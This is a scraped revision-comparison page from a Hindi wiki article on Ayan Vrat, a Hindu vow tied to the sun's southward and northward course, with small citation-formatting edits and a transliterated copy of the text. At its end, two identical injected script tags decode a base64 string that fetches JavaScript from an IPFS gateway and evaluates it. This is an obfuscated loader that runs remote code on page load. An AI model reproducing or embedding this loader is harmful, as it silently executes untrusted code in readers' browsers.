Difference between revisions of "अयन व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "उल्लखित" to "उल्लिखित")
m (Text replace - ")</ref" to "</ref")
 
(2 intermediate revisions by the same user not shown)
Line 2: Line 2:
 
*अयनव्रत [[सूर्य देव|सूर्य]] की [[गति]] पर निर्भर रहता है।  
 
*अयनव्रत [[सूर्य देव|सूर्य]] की [[गति]] पर निर्भर रहता है।  
 
*दो अयन होते हैं। जब सूर्य [[कर्कट राशि]] में प्रवेश करता है, तब दक्षिणायन का आरम्भ होता है।  
 
*दो अयन होते हैं। जब सूर्य [[कर्कट राशि]] में प्रवेश करता है, तब दक्षिणायन का आरम्भ होता है।  
*कालनिर्णयकारिका<ref>(कालनिर्णयकारिका 14)</ref> में आया है- 'दक्षिण एवं उत्तर अयन क्रम से भयंकर एवं शान्त कृत्यों के लिए है" और उसके विवरण में आया है कि माताओं, [[भैरव]], [[वराह अवतार|वराह]], [[नृसिंह अवतार|नरसिंह]], [[वामन अवतार|वामन]] एवं [[दुर्गा]] की मूर्तियाँ दक्षिणायन में स्थापित की जाती हैं।<ref>कृत्यरत्नाकर (218), हेमाद्रि (काल, 16); समयमयूख (173); समयप्रकाश (13)</ref>  
+
*कालनिर्णयकारिका<ref>कालनिर्णयकारिका 14</ref> में आया है- 'दक्षिण एवं उत्तर अयन क्रम से भयंकर एवं शान्त कृत्यों के लिए है" और उसके विवरण में आया है कि माताओं, [[भैरव]], [[वराह अवतार|वराह]], [[नृसिंह अवतार|नरसिंह]], [[वामन अवतार|वामन]] एवं [[दुर्गा]] की मूर्तियाँ दक्षिणायन में स्थापित की जाती हैं।<ref>कृत्यरत्नाकर (218), हेमाद्रि (काल, 16); समयमयूख (173); समयप्रकाश (13</ref>  
 +
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 12:37, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • ayanavrat soory ki gati par nirbhar rahata hai.
  • do ayan hote haian. jab soory karkat rashi mean pravesh karata hai, tab dakshinayan ka arambh hota hai.
  • kalanirnayakarika[1] mean aya hai- 'dakshin evan uttar ayan kram se bhayankar evan shant krityoan ke lie hai" aur usake vivaran mean aya hai ki mataoan, bhairav, varah, narasianh, vaman evan durga ki moortiyaan dakshinayan mean sthapit ki jati haian.[2]

tika tippani aur sandarbh

  1. kalanirnayakarika 14
  2. krityaratnakar (218), hemadri (kal, 16); samayamayookh (173); samayaprakash (13

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>